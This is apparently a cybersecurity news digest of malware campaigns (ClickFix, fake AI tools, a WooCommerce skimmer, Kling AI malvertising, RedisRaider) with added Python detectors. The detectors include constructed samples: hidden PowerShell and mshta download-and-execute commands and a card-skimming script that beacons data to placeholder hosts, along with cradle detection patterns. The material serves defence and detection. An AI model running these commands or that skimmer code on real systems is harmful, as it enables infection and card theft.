CyberSecurity news

FlagThis - #malware

Pierluigi Paganini@Security Affairs //
Cybercriminals are using a fake Bitdefender website to distribute the Venom RAT (Remote Access Trojan) and other malicious programs, tricking users into downloading what they believe is legitimate antivirus software. The spoofed domain, bitdefender-download[.]com, closely mimics the official Bitdefender site, making it difficult for unsuspecting users to distinguish between the real and fake versions. This campaign highlights the importance of verifying the legitimacy of software download sources to avoid becoming a victim of malware.

Researchers have found that clicking on the "Download for Windows" button on the fraudulent site initiates a file download from a Bitbucket repository that redirects to an Amazon S3 bucket. The downloaded ZIP archive, named "BitDefender.zip," contains an executable ("StoreInstaller.exe") which includes malware configurations associated with Venom RAT, as well as code related to the open-source post-exploitation framework SilentTrinity and StormKitty stealer. These tools work in concert to compromise user systems.

The Venom RAT allows attackers to harvest data and maintain persistent remote access to compromised systems. StormKitty steals passwords, including cryptocurrency wallet credentials, while SilentTrinity gives the attacker a post-exploitation channel for staying hidden and keeping long-term control. DomainTools, which analyzed the site, notes that it shares hosting infrastructure with other fake sites impersonating banks and IT services, and suspects the cloned Bitdefender page was also used in phishing.

Recommended read:
References :
  • securityaffairs.com: Crooks use a fake antivirus site to spread Venom RAT and a mix of malware
  • The Hacker News: Cybercriminals Clone Antivirus Site to Spread Venom RAT and Steal Crypto Wallets
  • PCMag UK security: Don't Fall For It: Fake Bitdefender Site Will Infect Your PC With Malware
  • www.pcmag.com: Don't Fall For It: Fake Bitdefender Site Will Infect Your PC With Malware | PCMag

djohnson@CyberScoop //
Mandiant, in collaboration with Google Cloud, has uncovered a cybercriminal campaign exploiting public interest in AI video generation. A group tracked as UNC6032, believed to be based in Vietnam, is spreading malware through fake advertisements, websites, and social media posts that promise access to popular prompt-to-video AI tools like Luma AI, Canva Dream Lab, and Kling AI. These malicious campaigns are designed to trick users into downloading infostealers and backdoors, compromising their devices and data.

UNC6032 has successfully reached millions of users across various social media platforms, including Facebook and LinkedIn, with thousands of malicious ads. These advertisements lure victims to phishing pages disguised as legitimate AI video generators. When users click on the "Start Free Now" button, they are led through a bogus video generation interface. After watching a fake loading bar, the site delivers a ZIP file containing malware. Once executed, this malware backdoors the victim's device and steals sensitive information.

Compromised users have experienced the theft of login credentials, cookies, credit card data, and Facebook account information. Mandiant's research indicates that the scheme affects a wide range of industries and geographic areas. Researchers caution users to be wary of advertisements promising free access to premium software and to verify where a download actually comes from before running any archive or pasted command obtained from an unfamiliar site.

Recommended read:
References :
  • Threats | CyberScoop: Mandiant flags fake AI video generators laced with malware
  • PCMag UK security: Warning AI-Generated TikTok Videos Want to Trick You Into Installing Malware
  • cloud.google.com: Google Mandiant Threat Defense investigates a UNC6032 campaign that exploits interest in AI tools. UNC6032 utilizes fake "AI video generator" websites to deliver malware leading to the deployment of Python-based infostealers and several backdoors.
  • Malwarebytes: Fake AI video generator tools lure in Facebook and LinkedIn users to deliver malware
  • hackread.com: Fake AI Video Tool Ads on Facebook, LinkedIn Spread Infostealers
  • www.techradar.com: Millions of users could fall for fake Facebook ad for a text-to-AI-video tool that is just malware
  • CyberInsider: Cybercriminals Use Fake AI Video Tools to Deliver Infostealers
  • The Hacker News: Reports on the use of fake installers for popular AI tools to spread ransomware and malware.

Puja Srivastava@Sucuri Blog //
Cybercriminals are increasingly employing sophisticated social engineering techniques to distribute malware, with a recent surge in attacks leveraging fake CAPTCHA prompts and AI-generated TikTok videos. These campaigns, collectively known as "ClickFix," manipulate users into executing malicious PowerShell commands, leading to system compromise and the installation of information-stealing malware. A notable example involves a fake Google Meet page hosted on compromised WordPress sites, which tricks visitors into copying and pasting a specific PowerShell command under the guise of fixing a "Microphone Permission Denied" error. Once executed, the command downloads a remote access trojan (RAT), granting attackers full control over the victim's system.

The ClickFix technique is also being amplified through AI-generated TikTok videos that promise free access to premium software like Windows, Microsoft Office, Spotify, and CapCut. These videos instruct users to run PowerShell scripts, which instead install Vidar and StealC malware, capable of stealing login credentials, credit card data, and 2FA codes. Trend Micro researchers note that the use of AI allows for rapid production and tailoring of these videos to target different user segments. These tactics have proven highly effective, with one video promising to "boost your Spotify experience instantly" amassing nearly 500,000 views.

Detecting and preventing ClickFix attacks requires a multi-faceted approach. Security experts recommend disabling the Windows Run dialog via Group Policy Objects (GPOs) or turning off the "Windows + R" hotkey where users do not need it. Users should treat unsolicited technical instructions with suspicion, verify the legitimacy of video sources, and never paste PowerShell commands from untrusted sources. On the detection side, monitoring process creation events (Windows Security event 4688 or Sysmon Event ID 1) for command lines containing keywords like "not a robot," "captcha," "secure code," and "human" can surface these attacks, because the pasted commands often carry such text as a trailing comment so that the Run dialog looks harmless; PowerShell or mshta launched as a child of explorer.exe with a download-and-execute command line is a related signal. These measures, combined with public awareness, are crucial in mitigating the growing threat posed by ClickFix campaigns.
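
Detection logic for the process-creation check described above, as an added example that is not code from the original article or from any of the cited vendors. It scores Sysmon Event ID 1 style records (fields Image, ParentImage, CommandLine) on the keywords the article names, on whether an interpreter was launched from the Run dialog (a child of explorer.exe), and on a short list of download-and-execute indicators that is my own heuristic. The sample events are constructed and the hostnames in them are placeholders.

```python
import re

# Lure phrases the article recommends watching for in process creation command lines.
# Pasted ClickFix commands often carry them as a trailing comment so the Run dialog
# shows something reassuring, e.g. "... # I am not a robot - reCAPTCHA Verification ID: 7811".
CLICKFIX_LURES = ("not a robot", "captcha", "secure code", "human", "verification")

# Download-and-execute "cradle" indicators (heuristic list, my assumption, not from the article).
CRADLE_PATTERNS = [
    ("web download", re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring)\b", re.I)),
    ("in-memory execution", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("mshta remote content", re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I)),
    ("hidden window", re.compile(r"-(w|windowstyle)\s+hidden", re.I)),
    ("encoded command", re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("URL in command line", re.compile(r"https?://", re.I)),
]

# Interpreters a ClickFix victim is asked to launch from the Run dialog.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> dict:
    """Score one process creation event (Sysmon field names: Image, ParentImage, CommandLine)."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []

    # Win+R -> Run dialog starts the interpreter as a child of explorer.exe.
    from_run_dialog = image in INTERPRETERS and parent == "explorer.exe"
    if from_run_dialog:
        reasons.append("interpreter launched by explorer.exe (Run dialog)")

    lures = [k for k in CLICKFIX_LURES if k in cmd.lower()]
    if lures:
        reasons.append("lure text in command line: " + ", ".join(lures))

    cradles = [name for name, pat in CRADLE_PATTERNS if pat.search(cmd)]
    if cradles:
        reasons.append("download/execute indicators: " + ", ".join(cradles))

    # Lure text alone is a strong signal; otherwise require Run-dialog origin plus a cradle.
    alert = bool(lures) or (from_run_dialog and bool(cradles))
    return {"alert": alert, "reasons": reasons}


def scan(events: list) -> list:
    """Return the indices of events that should raise an alert."""
    return [i for i, ev in enumerate(events) if analyze(ev)["alert"]]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # pasted ClickFix command: hidden PowerShell, download, IEX, reassuring comment
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell -w hidden -c \"iex (iwr 'https://verify.example.invalid/x.txt' -UseBasicParsing)\" # I am not a robot - reCAPTCHA Verification ID: 7811",
    },
    {   # admin opening PowerShell from Run and typing a local command: no alert
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell -NoExit -Command \"Get-Process | Sort-Object CPU -Descending\"",
    },
    {   # scheduled task running a local script: no alert
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\update.ps1",
    },
    {   # mshta variant of ClickFix: remote HTA from the Run dialog, no lure text
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "mshta https://verify.example.invalid/check.hta",
    },
]

if __name__ == "__main__":
    for i in scan(SAMPLE_EVENTS):
        print(i, analyze(SAMPLE_EVENTS[i])["reasons"])
```

The keyword "human" is deliberately broad and will be noisy on its own, which is why the rule only escalates lure text alone and otherwise requires both the Run-dialog parent and a download indicator.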

Recommended read:
References :
  • Sucuri Blog: Fake Google Meet Page Tricks Users into Running PowerShell Malware
  • securityonline.info: Fake Google Meet Page Tricks Users into Running Malware
  • gbhackers.com: How Google Meet Pages Are Exploited to Deliver PowerShell Malware
  • securityaffairs.com: Crooks use TikTok videos with fake tips to trick users into running commands that install Vidar and StealC malware in ClickFix attacks.
  • securityonline.info: Threat actors have ramped up a new social engineering campaign, dubbed "ClickFix," where fake CAPTCHA prompts embedded in
  • Know Your Adversary: I think you at least heard about fake CAPTCHA attacks. Yes, ClickFix again. The thing is - adversaries use fake CAPTCHA pages to trick users into executing malicious commands in Windows.

The Hacker News //
A concerning trend has emerged on TikTok where cybercriminals are exploiting the platform's widespread reach through AI-generated videos to distribute malware. These deceptive videos lure users into executing malicious PowerShell commands under the guise of providing instructions for software activation or unlocking premium features for applications like Windows, Microsoft Office, Spotify, and CapCut. Trend Micro researchers discovered that these videos, often featuring AI-generated voices and visuals, instruct viewers to run specific commands that ultimately download and install information-stealing malware such as Vidar and StealC.

One notable example highlighted by researchers involves a TikTok video claiming to offer instant Spotify enhancements, which amassed nearly half a million views along with a significant number of likes and comments. However, instead of delivering the promised benefits, the command provided in the video downloads a remote script that installs Vidar or StealC malware, executing it as a hidden process with elevated system privileges. These infostealers are designed to harvest sensitive information, including credentials, browser sessions, and cryptocurrency wallets, posing a substantial risk to unsuspecting users who fall victim to this social-engineering attack.

Security experts warn that these attacks are leveraging the "ClickFix" technique and using AI to generate convincing "how-to" videos. By exploiting the trust users place in video tutorials and the desire for free software or features, cybercriminals are effectively tricking individuals into infecting their own systems. Once active, the malware connects to command-and-control (C&C) servers to exfiltrate stolen data. Vidar employs stealthy tactics, utilizing platforms like Steam and Telegram as Dead Drop Resolvers to hide C&C details, while StealC uses direct IP connections. Users are urged to exercise caution and verify the legitimacy of instructions before running any commands provided in online videos.

Recommended read:
References :
  • CyberInsider: AI-Generated Videos on TikTok Push Vidar and StealC Infostealers
  • Virus Bulletin: Trend Micro researcher Junestherry Dela Cruz describes a TikTok campaign that uses possibly AI-generated videos to lure victims into executing PowerShell commands that lead to Vidar and StealC information stealers.
  • BleepingComputer: TikTok videos now push infostealer malware in ClickFix attacks
  • Help Net Security: TikTok videos + ClickFix tactic = Malware infection
  • bsky.app: Cybercriminals are using TikTok videos to trick users into infecting themselves with Vidar and StealC information-stealing malware in ClickFix attacks.
  • The Hacker News: The malware known as Latrodectus has become the latest to embrace the widely-used social engineering technique called ClickFix as a distribution vector.
  • securityonline.info: Trend Micro reveals a growing threat on TikTok, where AI-generated videos deceive users into running malicious PowerShell commands
  • Thomas Fox-Brewster: Forbes discusses AI TikTok Videos Promising Free Spotify And Windows Subscriptions Trick Users Into Installing Malware Instead.
  • www.scworld.com: Infostealer deployed via TikTok videos
  • TARNKAPPE.INFO: ClickFix-Malware über TikTok: Mit viralen TikTok-Videos als Trojanischem Pferd starten Cyberkriminelle neue Angriffswellen.
  • bsky.app: BleepingComputer reports Cybercriminals are using TikTok videos to trick users into infecting themselves with Vidar and StealC information-stealing malware in ClickFix attacks.
  • www.sentinelone.com: SentinelOne's Mary Braden Murphy shows how ClickFix is weaponizing verification fatigue to deliver RATs & infostealers. Tricking victims into infecting themselves in this manner has proven highly effective, with threat actors increasingly folding this technique into their playbook.
  • The DefendOps Diaries: Unmasking ClickFix: The New Cyber Threat on TikTok
  • securityaffairs.com: Fake software activation videos on TikTok spread Vidar, StealC.
  • The Hacker News: Hackers Use TikTok Videos to Distribute Vidar and StealC Malware via ClickFix Technique
  • ciso2ciso.com: Fake software activation videos on TikTok spread Vidar, StealC – Source: securityaffairs.com
  • www.techradar.com: Cybercriminals are using AI to generate convincing "how-to" videos.
  • PCMag UK security: Warning: AI-Generated TikTok Videos Want to Trick You Into Installing Malware
  • Threats | CyberScoop: Mandiant flags fake AI video generators laced with malware
  • Virus Bulletin: Google Mandiant Threat Defense investigates a UNC6032 campaign that exploits interest in AI tools. UNC6032 utilizes fake "AI video generator" websites to deliver malware leading to the deployment of Python-based infostealers and several backdoors.
  • cloud.google.com: Google Mandiant Threat Defense investigates a UNC6032 campaign that exploits interest in AI tools. UNC6032 utilizes fake "AI video generator" websites to deliver malware leading to the deployment of Python-based infostealers and several backdoors.
  • hackread.com: Mandiant Threat Defense uncovers a campaign where Vietnam-based group UNC6032 tricks users with malicious social media ads for…
  • Malwarebytes: Cybercriminals are using text-to-video-AI tools to lure victims to fake websites that deliver malware like infostealers and Trojans.

@cyberinsider.com //
Cybersecurity researchers have uncovered a sophisticated malware campaign distributing the Winos 4.0 framework through trojanized installers of popular applications such as LetsVPN and QQBrowser. The campaign, active since February 2025, primarily targets Chinese-speaking environments and showcases careful, long-term planning by a capable threat actor. The attackers use fake software installers to trick users into installing the malware, which grants remote access to compromised systems.

The Winos 4.0 malware is delivered using a multi-layered infection chain called the Catena loader. This loader employs multi-stage reflective loaders and in-memory payload delivery techniques to evade traditional antivirus tools. The infection process begins with seemingly legitimate NSIS installers bundled with signed decoy applications and malicious components like shellcode embedded in ".ini" files and reflective DLLs. This modular approach allows the attackers to adapt quickly to detection pressures, as observed in the evolution of tactics from February to April 2025.

Once installed, Winos 4.0 connects to attacker-controlled servers, predominantly hosted in Hong Kong, to receive follow-up instructions or additional malware. The malware framework, built atop the foundations of Gh0st RAT, is written in C++ and utilizes a plugin-based system to harvest data, provide remote shell access, and launch distributed denial-of-service (DDoS) attacks. This campaign highlights the ongoing risk posed by trojanized software and emphasizes the importance of verifying software sources to prevent malware infections.

Recommended read:
References :

@securityonline.info //
A new and stealthy formjacking malware has been discovered targeting WooCommerce, the popular e-commerce plugin for WordPress. The malware discreetly steals customer payment data from legitimate checkout processes, posing a significant threat to online businesses. Unlike traditional skimmers that simply overlay payment forms, this malware integrates seamlessly into the checkout process, exfiltrating sensitive customer data without raising immediate suspicion.

The malware injects a fake payment form into legitimate checkout pages, meticulously mimicking the design and functionality of the actual site, and captures card numbers, expiration dates, CVVs, and personal information such as names and addresses. Rather than sending each keystroke immediately, it stashes the captured values in the browser's localStorage, which persists across page loads, so data typed into a checkout that is later abandoned or reloaded is still retained. Transmission is triggered when the "Place Order" button is pressed: the stored data is sent to a remote command-and-control (C2) server with navigator.sendBeacon(), which fires asynchronously and neither blocks nor visibly delays the page, so nothing looks wrong to the shopper.

The infection vector is believed to be through compromised WordPress admin accounts. Attackers inject malicious JavaScript code via plugins like Simple Custom CSS and JS, exploiting their capabilities to insert code dynamically. This allows the malware to monitor user input on checkout fields continuously, capturing data even if the purchase isn't completed. Cybersecurity experts recommend implementing robust security measures, including regular security audits, up-to-date software, and careful monitoring of third-party dependencies, to protect against such attacks.
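
A static scan for the skimmer traits described above, added here as an example and not code from the article or the researchers. The two JavaScript snippets are constructed (the skimmer-like one only imitates the shape the article describes; the beacon endpoint and hostnames are placeholders), and the indicator patterns and the scoring rule are my assumptions. It is meant for triaging code snippets pulled out of a WordPress database or a custom-JS plugin, where the question is "does this script read card fields and ship them somewhere off-site?".

```python
import re
from urllib.parse import urlparse

# Indicators of the behaviour described in the article (heuristic patterns, my assumption).
CARD_FIELD_RE = re.compile(r"(card[-_ ]?number|cc[-_]?num|cvv|cvc|expir|exp[-_]?date)", re.I)
STORAGE_WRITE_RE = re.compile(r"(localStorage|sessionStorage)\.setItem\s*\(")
ORDER_HOOK_RE = re.compile(r"(#?place_order\b|checkout_place_order|Place Order)", re.I)
# First string-literal argument of navigator.sendBeacon(...) or fetch(...)
EXFIL_CALL_RE = re.compile(r"(?:navigator\.sendBeacon|fetch)\s*\(\s*['\"]([^'\"]+)['\"]")


def external_endpoints(js: str, site_host: str) -> list:
    """URLs handed to sendBeacon/fetch whose host is not the shop's own host (or a subdomain of it)."""
    site_host = site_host.lower()
    found = []
    for url in EXFIL_CALL_RE.findall(js):
        host = (urlparse(url).hostname or "").lower()
        # relative URLs have no host and stay first-party
        if host and host != site_host and not host.endswith("." + site_host):
            found.append(url)
    return found


def score_snippet(js: str, site_host: str) -> dict:
    has_card = bool(CARD_FIELD_RE.search(js))
    has_store = bool(STORAGE_WRITE_RE.search(js))
    has_hook = bool(ORDER_HOOK_RE.search(js))
    ext = external_endpoints(js, site_host)

    findings = []
    if has_card:
        findings.append("touches card/CVV/expiry fields")
    if has_store:
        findings.append("writes captured values to Web Storage")
    if has_hook:
        findings.append("hooks the Place Order action")
    if ext:
        findings.append("sends to external origin: " + ", ".join(ext))

    # Verdict rule: card-field access plus an off-site sink plus one more skimmer trait.
    skimmer = has_card and bool(ext) and (has_store or has_hook)
    return {"verdict": "skimmer-like" if skimmer else "not flagged", "findings": findings}


SITE_HOST = "shop.example.com"

# Constructed skimmer-style snippet in the shape the article describes (not the real malware).
SKIMMER_JS = r"""
document.querySelectorAll('#card-number,#card-cvv,#card-expiry,#billing_first_name').forEach(function (el) {
  el.addEventListener('input', function () { localStorage.setItem('wc_chk_' + el.id, el.value); });
});
document.querySelector('#place_order').addEventListener('click', function () {
  navigator.sendBeacon('https://cdn-stats.example.invalid/collect', JSON.stringify(localStorage));
});
"""

# Constructed first-party analytics snippet: also uses sendBeacon, but to the shop's own host.
BENIGN_JS = r"""
window.addEventListener('pagehide', function () {
  navigator.sendBeacon('https://shop.example.com/wp-json/wc-analytics/v1/pageview',
                       JSON.stringify({ path: location.pathname }));
});
"""

if __name__ == "__main__":
    for label, js in (("skimmer", SKIMMER_JS), ("benign", BENIGN_JS)):
        print(label, score_snippet(js, SITE_HOST))
```

The external-origin check is the part worth keeping even if the other regexes are tuned away: a legitimate WooCommerce checkout has no reason to beacon card data to a host outside the store, and the same allowlist can be enforced at runtime with a Content-Security-Policy `connect-src` directive.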

Recommended read:
References :
  • securityonline.info: Stealthy Skimmer: New Formjacking Malware Targets WooCommerce Checkouts
  • cyberpress.org: Formjacking Malware Emerges Targeting E-Commerce Sites for Credit Card Data
  • gbhackers.com: New Formjacking Malware Targets E-Commerce Sites to Steal Credit Card Data

Waqas@hackread.com //
A massive data breach has exposed over 184 million passwords and login credentials from various online platforms, including major players like Google, Microsoft, Facebook, and Apple. The unprotected database, containing 184,162,718 records, was discovered by security researcher Jeremiah Fowler. The exposed data includes logins for accounts connected to multiple governments, highlighting the severity of the potential impact.

The exposed Elastic database, which was over 47 GB in size, contained a plain text file with millions of sensitive pieces of data, lacking encryption, password protection, or any security measures. Fowler noted the unusual nature of the discovery, as the database didn't offer any clues about its owner or the source of the collected data. The unsecured nature of the database highlights the risks associated with recklessly compiling sensitive information in a single, vulnerable repository.

The incident underscores the importance of robust data security practices and the potential consequences of misconfigured or unsecured databases. The exposure of millions of plaintext passwords and login credentials raises significant concerns about potential misuse and unauthorized access to personal accounts. The discovery serves as a stark reminder of the need for organizations to prioritize data protection and implement strong security measures to safeguard sensitive user information.

Recommended read:
References :
  • hackread.com: Database Leak Reveals 184 Million Infostealer-Harvested Emails and Passwords
  • PCMag UK security: Security Nightmare: Researcher Finds Trove of 184M Exposed Logins for Google, Apple, More
  • WIRED: Mysterious Database of 184 Million Records Exposes Vast Array of Login Credentials
  • www.zdnet.com: Massive data breach exposes 184 million passwords for Google, Microsoft, Facebook, and more
  • Davey Winder: 184,162,718 Passwords And Logins Leaked — Apple, Facebook, Snapchat
  • DataBreaches.Net: Mysterious database of 184 million records exposes vast array of login credentials
  • 9to5Mac: Apple logins with plain text passwords found in massive database of 184M records
  • www.engadget.com: Someone Found Over 180 Million User Records in an Unprotected Online Database
  • borncity.com: Suspected InfoStealer data leak exposes 184 million login data
  • databreaches.net: The possibility that data could be inadvertently exposed in a misconfigured or otherwise unsecured database is a longtime privacy nightmare that has been difficult to fully address.
  • borncity.com: [German]Security researcher Jeremiah Fowler came across a freely accessible and unprotected database on the Internet. The find was quite something, as a look at the data sets suggests that it was probably data collected by InfoStealer malware. Records containing 184 …
  • securityonline.info: 184 Million Leaked Credentials Found in Open Database
  • Know Your Adversary: 184 Million Records Database Leak: Microsoft, Apple, Google, Facebook, PayPal Logins Found
  • securityonline.info: Security researchers have identified a database containing a staggering 184 million account credentials, prompting yet another urgent reminder to

@cyberscoop.com //
A federal grand jury indictment unsealed today has charged 16 defendants who allegedly developed and deployed the DanaBot malware, a scheme that infected over 300,000 computers globally. The malware, controlled and deployed by a Russia-based cybercrime organization, facilitated fraud and ransomware attacks, causing at least $50 million in damage. Aleksandr Stepanov, 39, also known as "JimmBee," and Artem Aleksandrovich Kalinkin, 34, also known as "Onix," both of Novosibirsk, Russia, are among those charged.

The DanaBot malware was distributed through spam email messages containing malicious attachments or hyperlinks. Once a computer was infected, it became part of a botnet, allowing operators to remotely control the compromised machines. The malware operated on a malware-as-a-service model, offering access to the botnet and support tools to clients for a fee. DanaBot had extensive capabilities, including stealing data, hijacking banking sessions, recording keystrokes, and providing full remote access to victim computers.

In addition to the criminal charges related to DanaBot, the U.S. Department of Justice announced the seizure of internet domains tied to the LummaC2 information-stealing malware operation, which has been actively targeting U.S. critical infrastructure. The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have issued a joint advisory warning of these campaigns, which involve the deployment of the LummaC2 infostealer to breach networks and siphon off sensitive data. Microsoft independently took down 2,300 internet domains also used by the LummaC2 actors.

Recommended read:
References :
  • DataBreaches.Net: 16 Defendants Federally Charged in Connection with DanaBot Malware Scheme That Infected Computers Worldwide
  • The Register - Security: Suspected creeps behind DanaBot malware that hit 300K+ computers revealed
  • WIRED: Feds Charge 16 Russians Allegedly Tied to Botnets Used in Ransomware, Cyberattacks, and Spying
  • Threats | CyberScoop: DanaBot malware operation seized in global takedown
  • krebsonsecurity.com: Oops: DanaBot Malware Devs Infected Their Own PCs
  • Risky Business Media: Risky Bulletin: DanaBot and Lumma Stealer taken down
  • borncity.com: Operations Endgame, DanaBot-Net and Raptor disrupt infrastructure for ransomware attacks and more
  • hackread.com: Operation Endgame Takes Down DanaBot Malware, Neutralizes 300 Servers
  • The Hacker News: U.S. Dismantles DanaBot Malware Network, Charges 16 in $50M Global Cybercrime Operation

@securityonline.info //
SK Telecom, South Korea's largest mobile network operator, revealed a significant data breach in April 2025 that exposed the USIM data of 27 million subscribers. The company first detected malware on its networks on April 19, 2025, and responded by isolating the compromised servers. Investigations have since revealed the breach began as far back as June 15, 2022, with attackers deploying a web shell on one of SK Telecom's servers. This initial compromise provided a foothold in the network allowing them to execute commands and deploy additional malware payloads across multiple servers.

The attackers were able to steal a wide array of sensitive information, including users’ IMSI numbers, USIM authentication keys, network usage data, text messages, and contacts stored on SIM cards. A joint investigative committee comprising the South Korean government and SK Telecom discovered 25 separate backdoor programs on the company’s servers. Due to the undetected nature of the breach for nearly three years, the intruders were able to implant backdoors tailored to different malicious functions. SK Telecom only began logging server activity on December 31, 2024, creating a data void between June 15, 2022, and December 31, 2024, making it difficult to ascertain what data was exfiltrated or what malicious operations were executed during that time.

The breach has affected an estimated 26.95 million SK Telecom users, prompting the company to take immediate action. SK Telecom has suspended the onboarding of new customers and announced it will begin notifying all affected individuals to replace their SIM cards and adopt enhanced security measures. To mitigate the risks associated with SIM-swapping attacks, SK Telecom announced it would issue replacement SIM cards to all affected customers, while also implementing stricter safeguards to prevent unauthorized number transfers. The company also confirmed that USIM records for its entire subscriber base of 29 million people were exposed.

Recommended read:
References :

@research.checkpoint.com //
A sophisticated cyberattack campaign is exploiting the popularity of the generative AI service Kling AI to distribute malware through fake Facebook ads. Check Point Research uncovered the campaign, which began in early 2025. The attackers created convincing spoof websites mimicking Kling AI's interface, luring users with the promise of AI-generated content. These deceptive sites, promoted via at least 70 sponsored posts on fake Facebook pages, ultimately trick users into downloading malicious files.

Instead of delivering the promised AI-generated images or videos, the spoofed websites serve a Trojan horse: a ZIP archive containing an .exe file whose name is padded with Hangul Filler characters (U+3164, which render as blank space) between a fake .jpg or .mp4 extension and the real .exe extension, so the executable passes for a media file in file listings. When executed, the file installs a loader with anti-analysis features that disables security tools and establishes persistence on the victim's system. This initial loader then fetches a second-stage payload, the PureHVNC remote access trojan (RAT).

The PureHVNC RAT grants attackers remote control over the compromised system and steals sensitive data. It specifically targets browser-stored credentials and session tokens, with a focus on Chromium-based browsers and cryptocurrency wallet extensions like MetaMask and TronLink. Additionally, the RAT uses a plugin to capture screenshots when banking apps or crypto wallets are detected in the foreground. Check Point Research believes that Vietnamese threat actors are likely behind the campaign, as they have historically employed similar Facebook malvertising techniques to distribute stealer malware, capitalizing on the popularity of generative AI tools.
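
A filename check for the Hangul Filler trick, added as an example and not the researchers' code. The article names only Hangul Filler; the other invisible characters in the table, the generic fallback to Unicode format characters, the executable-extension list, and the sample archive member names are my additions. The idea is simple: strip the invisible characters to see what Windows will really execute, compare that with the extension a user sees before the blank run, and flag the mismatch.

```python
import unicodedata

# Characters that render as blank and are used to push the real extension out of view.
# The article names Hangul Filler; the other entries are my additions of the same kind.
INVISIBLE_FILLERS = {
    "\u3164": "HANGUL FILLER",
    "\u115f": "HANGUL CHOSEONG FILLER",
    "\u1160": "HANGUL JUNGSEONG FILLER",
    "\uffa0": "HALFWIDTH HANGUL FILLER",
    "\u200b": "ZERO WIDTH SPACE",
    "\u2060": "WORD JOINER",
}
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse", ".vbs", ".hta", ".msi", ".lnk"}


def _is_filler(c: str) -> bool:
    # Known fillers plus any Unicode "format" character (Cf), which also renders as nothing.
    return c in INVISIBLE_FILLERS or unicodedata.category(c) == "Cf"


def _ext(name: str) -> str:
    return ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""


def analyze_filename(name: str) -> dict:
    fillers = [c for c in name if _is_filler(c)]
    stripped = "".join(c for c in name if not _is_filler(c))
    real_ext = _ext(stripped)                        # what Windows will actually open it as
    visible = name.split(fillers[0], 1)[0] if fillers else stripped
    apparent_ext = _ext(visible)                     # what the user sees before the blank run
    masquerade = bool(fillers) and real_ext in EXECUTABLE_EXTS and apparent_ext != real_ext
    return {
        "real_ext": real_ext,
        "apparent_ext": apparent_ext,
        "filler_count": len(fillers),
        "filler_names": sorted({INVISIBLE_FILLERS.get(c) or unicodedata.name(c, "UNNAMED FORMAT CHARACTER")
                                for c in fillers}),
        "masquerade": masquerade,
    }


def suspicious_members(names: list) -> list:
    """Filter archive member names down to the masquerading ones."""
    return [n for n in names if analyze_filename(n)["masquerade"]]


# Constructed archive listing (not from the campaign).
SAMPLE_MEMBERS = [
    "Generated_Video_2025-05-01.mp4" + "\u3164" * 40 + ".exe",   # media name, executable extension
    "Generated_Image_2025-05-01.jpg",                             # plain image, nothing to flag
    "readme.txt" + "\u3164" * 3,                                  # fillers present but not executable
    "invoice.pdf" + "\u200b" * 12 + ".scr",                       # zero-width variant of the same trick
]

if __name__ == "__main__":
    for n in SAMPLE_MEMBERS:
        print(repr(n[:32]), analyze_filename(n))
```

Run it over the member list of a downloaded ZIP (for example `zipfile.ZipFile(path).namelist()`) before anything is extracted; an archive that contains a single member with a media-looking name and an executable real extension is the pattern the article describes.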

Recommended read:
References :
  • hackread.com: Scammers Use Fake Kling AI Ads to Spread Malware
  • Check Point Blog: Exploiting the AI Boom: How Threat Actors Are Targeting Trust in Generative Platforms like Kling AI
  • gbhackers.com: Malicious Hackers Create Fake AI Tool to Exploit Millions of Users
  • securityonline.info: AI Scam Alert: Fake Kling AI Sites Deploy Infostealer, Hide Executables
  • The Hacker News: Fake Kling AI Facebook ads deliver RAT malware to over 22 million potential victims.
  • blog.checkpoint.com: Exploiting the AI Boom: How Threat Actors Are Targeting Trust in Generative Platforms like Kling AI
  • Virus Bulletin: Check Point's Jaromír Hořejší analyses a Facebook malvertising campaign that directs the user to a convincing spoof of Kling AI's website
  • Check Point Research: The Sting of Fake Kling: Facebook Malvertising Lures Victims to Fake AI Generation Website
  • Security Risk Advisors: 🚩 Facebook Malvertising Campaign Impersonates Kling AI to Deliver PureHVNC Stealer via Disguised Executables

Aminu Abdullahi@eSecurity Planet //
Cybersecurity researchers are raising alarms about a new cryptojacking campaign called RedisRaider, which targets publicly accessible Redis servers running on Linux. Discovered by Datadog Security Labs, RedisRaider employs an aggressive and technically complex attack chain to deploy Monero miners on compromised systems. The malware uses a custom-built scanner to identify exposed Redis servers across the internet and abuses misconfigured instances that accept unauthenticated commands. The long-known trick it relies on is to use CONFIG SET to point Redis's persistence directory and dump filename at a cron directory, store a key whose value is a crontab line, and issue SAVE, so the resulting dump file is picked up as a cron job that downloads and runs the primary payload.

The attackers behind RedisRaider have implemented advanced techniques to evade detection and analysis. The malware is written in Go and heavily obfuscated using a tool called Garble, hiding key functions within the code. Additionally, RedisRaider employs anti-forensic measures such as short key time-to-live (TTL) settings to erase traces, writing temporary files to cron directories to blend with system processes, and deleting keys and logs after execution to cover its tracks. These tactics make it challenging for security professionals to detect and analyze the malicious activity.

